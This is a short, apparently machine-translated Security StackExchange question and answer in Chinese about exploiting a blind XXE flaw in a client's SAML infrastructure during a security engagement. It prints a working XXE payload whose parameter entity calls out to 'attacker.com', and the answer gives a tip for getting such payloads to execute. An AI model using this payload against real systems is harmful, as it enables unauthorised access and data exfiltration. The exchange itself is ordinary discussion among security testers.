因此,我在客户端接触时发现了对SAML基础设施的盲目Xml外部实体(XXE)攻击,但它让我更早地尝试利用它。我可以构造一个简单的XXE:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/">%xxe;
]>
<xml></xml>我从他们的服务器获得http连接,但是任何更复杂的东西,比如从我那里获取一个DTD并运行它,都得不到任何好处。我可以看到DTD的提取,但是DTD请求(对我的服务器的简单调用)没有执行。所以,在我的头撞墙三天后,我想我应该问问社区,当攻击受到限制时,他们是否对XXE有任何聪明的窍门或任何攻击路径。
发布于 2018-06-07 01:52:30
就像这个领域里的任何事情一样,更多的研究永远不会伤害到你!
我尝试了一个在这里找到的有效负载( https://gist.github.com/staaldraad/01415b990939494879b4 ),它最初不起作用,但后来我意识到实现需要的是实际有效的xml标记,在示例的末尾没有!
https://security.stackexchange.com/questions/187241
复制相似问题